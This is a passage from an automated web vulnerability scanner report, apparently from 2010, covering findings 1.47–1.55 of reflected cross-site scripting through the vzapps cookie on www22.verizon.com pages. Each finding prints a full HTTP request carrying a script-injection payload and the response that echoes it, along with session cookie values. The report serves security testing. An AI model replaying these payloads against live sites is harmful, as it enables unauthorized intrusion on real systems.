Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXf6cb1'><script>alert(1)</script>68c67b1ae7a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 66928
Expires: Sat, 20 Nov 2010 02:23:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:23:59 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_State=TXf6cb1'><script>alert(1)</script>68c67b1ae7a; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:23:59 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF6CB1'><SCRIPT>ALERT(1)</SCRIPT>68C67B1AE7A ' />
...[SNIP]...

1.47. http://www22.verizon.com/Residential/DirecTV/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 570e7'><script>alert(1)</script>6b6f1e45695 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX570e7'><script>alert(1)</script>6b6f1e45695; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63787
Expires: Sat, 20 Nov 2010 02:08:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:08:56 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX570e7'><script>alert(1)</script>6b6f1e45695; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX570E7'><SCRIPT>ALERT(1)</SCRIPT>6B6F1E45695 ' />
...[SNIP]...

1.48. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 38b5e'><script>alert(1)</script>2f9927326e3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX38b5e'><script>alert(1)</script>2f9927326e3; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 179663
Expires: Sat, 20 Nov 2010 02:10:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:10:00 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX38b5e'><script>alert(1)</script>2f9927326e3; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Channels
</title><meta name="keywords" content="direct tv channels, hd tv channels, hd channels, tv channels, dvr channels, dire
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX38B5E'><SCRIPT>ALERT(1)</SCRIPT>2F9927326E3 ' />
...[SNIP]...

1.49. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c3f4'><script>alert(1)</script>7ab495a5358 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX3c3f4'><script>alert(1)</script>7ab495a5358; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71664
Expires: Sat, 20 Nov 2010 02:09:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:09:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX3c3f4'><script>alert(1)</script>7ab495a5358; path=/
Set-Cookie: ContextInfo_Equipment=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Receivers | HD DVR
</title><meta name="keywords" content="receiver, high definition receiver, hd reciever, dvr receiver, sd rece
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX3C3F4'><SCRIPT>ALERT(1)</SCRIPT>7AB495A5358 ' />
...[SNIP]...

1.50. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1519d'><script>alert(1)</script>3a6fe93579a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX1519d'><script>alert(1)</script>3a6fe93579a; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50561
Expires: Sat, 20 Nov 2010 02:10:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:10:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX1519d'><script>alert(1)</script>3a6fe93579a; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX1519D'><SCRIPT>ALERT(1)</SCRIPT>3A6FE93579A ' />
...[SNIP]...

1.51. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 234e2<script>alert(1)</script>1d6312f48ee was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX234e2<script>alert(1)</script>1d6312f48ee; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50557
Expires: Sat, 20 Nov 2010 02:10:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:10:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX234e2<script>alert(1)</script>1d6312f48ee; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX234E2<SCRIPT>ALERT(1)</SCRIPT>1D6312F48EE </DIV>
...[SNIP]...

1.52. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Packages/Packages.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aac86'><script>alert(1)</script>9a4605f90ae was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Packages/Packages.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXaac86'><script>alert(1)</script>9a4605f90ae; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 66986
Expires: Sat, 20 Nov 2010 02:09:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:09:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXaac86'><script>alert(1)</script>9a4605f90ae; path=/
Set-Cookie: ContextInfo_Language=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Packages | English
</title><meta name="keywords" content="spanish package, directv bundle package, bundle package, satellite bun
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAAC86'><SCRIPT>ALERT(1)</SCRIPT>9A4605F90AE ' />
...[SNIP]...

1.53. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Premium/Premium.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f7a6'><script>alert(1)</script>4ae828ebbcb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Premium/Premium.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX7f7a6'><script>alert(1)</script>4ae828ebbcb; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84381
Expires: Sat, 20 Nov 2010 02:09:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:09:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX7f7a6'><script>alert(1)</script>4ae828ebbcb; path=/
Set-Cookie: ContextInfo_DTVPremium=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Premiums
</title><meta name="keywords" content="channels, premium programming, sports packages, movie packages, premium packages
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7F7A6'><SCRIPT>ALERT(1)</SCRIPT>4AE828EBBCB ' />
...[SNIP]...

1.54. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/EntertainmentOnDemand/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57cde'><script>alert(1)</script>42fd9a96b01 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX57cde'><script>alert(1)</script>42fd9a96b01; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 49156
Expires: Sat, 20 Nov 2010 02:34:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:34:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX57cde'><script>alert(1)</script>42fd9a96b01; path=/
Set-Cookie: FLOWTYPE=VASIP; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Entertainment on Demand
</title><meta name="keywords" content="verizon entertainment on demand, verizon eod, verizon games, verizon movies
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX57CDE'><SCRIPT>ALERT(1)</SCRIPT>42FD9A96B01 ' />
...[SNIP]...

1.55. http://www22.verizon.com/Residential/EntertainmentOnDemand/Games/Games.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/EntertainmentOnDemand/Games/Games.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8aa13'><script>alert(1)</script>b18f6a6e3d9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Games/Games.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
